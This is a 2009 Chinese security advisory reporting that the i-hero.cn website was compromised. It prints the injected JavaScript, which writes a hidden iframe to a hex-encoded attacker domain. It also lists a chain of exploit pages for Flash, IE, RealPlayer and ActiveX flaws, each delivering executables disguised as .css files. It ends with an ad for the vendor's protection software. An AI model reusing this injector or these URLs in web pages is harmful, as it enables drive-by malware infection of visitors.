注册
登录
| 关键词: nbsp http 漏洞 frame cn afdf 联众 fdfe css exe |
发布时间:Sat, 3 Jan 2009 11:41:33 UTC 最后更新时间:Sat, 3 Jan 2009 11:41:33 UTC 知道创宇安全团队于今天捕获英特尔英雄会网站(www.i-hero.cn)被植入恶意代码,用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。MalUrl:http://www.i-hero.cn/flasha.js访问该页面会被365门神拦截恶意攻击: 网站脚本中被插入一段恶意代码: function Get(){var Then = new Date()Then.setTime(Then.getTime() + 24*60*60*1000)var cookieString = new String(document.cookie)var cookieHeader = “Cookie1=”var beginPosition = cookieString.indexOf(cookieHeader)if (beginPosition != -1){} else{ document.cookie = “Cookie1=risb;expires=”+ Then.toGMTString()document.writeln(”<iframe src=http:\/\/%61%66%64%66%34%64%73%34%66%34%64%2E%63%6E\/a108.htm width=0 height=0><\/iframe>”);}}Get(); 挂马分析: [wide]http://www.i-hero.cn/flasha.js [frame]http://afdf4ds4f4d.cn/a108.htm [frame]http://afdf4ds4f4d.cn/wwe.htm [frame]http://afdf4ds4f4d.cn/year.htm //flash漏洞 [frame]http://afdf4ds4f4d.cn/wm/cy.htm //超星漏洞 [exe]http://dfe44d1f.cn/xz/cx.css [frame]http://afdf4ds4f4d.cn/wm/s.htm //IE7 漏洞 [exe]http://fdfe1fd12f.cn/xz/ie.css [frame]http://afdf4ds4f4d.cn/wm/14.jpg //MS06-014漏洞 [exe]http://dfe1212fd21f.cn/xz/14.css [frame]http://afdf4ds4f4d.cn/wm/of.htm //snapshot漏洞 [exe]http://fdfe1fd12f.cn/wm/b.css [frame]http://afdf4ds4f4d.cn/wm/no.htm //新浪DLoader Class ActiveX漏洞 [exe]http://fdfe1fd12f.cn/xz/x.css [frame]http://afdf4ds4f4d.cn/wm/bf.htm //暴风影音漏洞 [exe]http://fdfe1fd12f.cn/xz/f.css [frame]http://afdf4ds4f4d.cn/wm/nlz.html //联众漏洞 [exe]http://fdfe1fd12f.cn/xz/nlz.css [frame]http://afdf4ds4f4d.cn/wm/l.htm //联众漏洞 [exe]http://fdfe1fd12f.cn/xz/l.css [frame]http://afdf4ds4f4d.cn/wm/l.gif //联众漏洞 [exe]http://fdfe1fd12f.cn/xz/d.css [frame]http://afdf4ds4f4d.cn/wm/r.htm //REALPLAYER漏洞 [exe]http://fdfe1fd12f.cn/xz/r.css [frame]http://afdf4ds4f4d.cn/wm/o.html //REALPLAYER漏洞 [exe]http://fdfe1fd12f.cn/xz/o.css [script]http://js.tongji.cn.yahoo.com/886375/ystat.js 推荐的应对方法: 安装365门神软件,对IE浏览器在打开网站的时候进行保护,拦截来自网络带有恶意代码的网页攻击。使用帮助和下载:http://365menshen.com |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|
